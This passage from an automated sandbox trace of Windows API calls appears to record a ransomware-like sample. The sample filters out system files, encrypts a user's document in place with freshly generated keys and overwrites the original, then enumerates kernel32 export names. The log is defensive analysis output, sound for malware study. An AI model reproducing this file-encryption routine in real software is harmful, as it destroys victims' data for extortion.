lstrcmpiW (lpString1="zrDg.rtf", lpString2="ntuser.dat.log") returned 1 [0082.631] lstrcmpiW (lpString1="zrDg.rtf", lpString2="thumbs.db") returned 1 [0082.631] lstrcmpiW (lpString1="zrDg.rtf", lpString2="Bootfont.bin") returned 1 [0082.631] lstrlenW (lpString="zrDg.rtf") returned 8 [0082.631] lstrcmpiW (lpString1="rtf", lpString2="lnk") returned 1 [0082.631] lstrcmpiW (lpString1="rtf", lpString2="exe") returned 1 [0082.631] lstrcmpiW (lpString1="rtf", lpString2="sys") returned -1 [0082.631] lstrcmpiW (lpString1="rtf", lpString2="dll") returned 1 [0082.631] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0082.631] lstrlenW (lpString="zrDg.rtf") returned 8 [0082.631] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0082.631] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="zrDg.rtf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\zrDg.rtf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\zrDg.rtf" [0082.631] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.631] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\zrDg.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\zrdg.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0082.631] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=95559) returned 1 [0082.631] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0082.631] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x10d0000 [0082.632] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.632] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.632] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.632] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0082.632] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0082.634] VirtualFree (lpAddress=0x10f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.634] UnmapViewOfFile (lpBaseAddress=0x10d0000) returned 1 [0082.635] CloseHandle (hObject=0x444) returned 1 [0082.635] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.635] WriteFile (in: hFile=0x440, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0082.636] CloseHandle (hObject=0x0) returned 0 [0082.636] CloseHandle (hObject=0x440) returned 1 [0082.636] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.636] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.636] GetTickCount () returned 0x114d21e [0082.636] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.637] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.637] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.637] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.637] lstrlenA (lpString="kernel32.dll") returned 12 [0082.637] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.637] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.637] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.638] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.638] lstrlenA (lpString="ADDATOMA") returned 8 [0082.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.638] lstrlenA (lpString="ADDATOMW") returned 8 [0082.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.638] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.638] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.638] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.638] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.638] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.638] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.638] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.638] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.638] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.638] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.638] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.638] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.638] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.638] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.638] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.639] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.639] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.639] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.639] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.639] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.639] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.639] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.639] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.639] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.639] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.639] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.639] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.639] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.639] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.639] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.639] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.639] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.639] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.639] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.640] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.640] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.640] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.640] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.640] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.640] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.640] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.640] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.640] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.640] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.640] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.640] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.640] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.640] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.640] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.640] lstrlenA (lpString="BEEP") returned 4 [0082.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.640] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.640] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.641] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.641] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.641] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.641] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.641] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.641] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.641] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.641] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.641] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.641] lstrlenA (lpString="CANCELIO") returned 8 [0082.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.641] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.641] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.641] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.641] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.641] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.641] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.641] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.641] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.642] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.642] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.642] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.642] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.642] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.642] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.642] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.642] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.642] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.642] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.642] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.642] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.642] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.642] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.642] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.642] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.642] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.642] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.643] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.643] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.643] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.643] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.643] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.643] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.643] lstrlenA 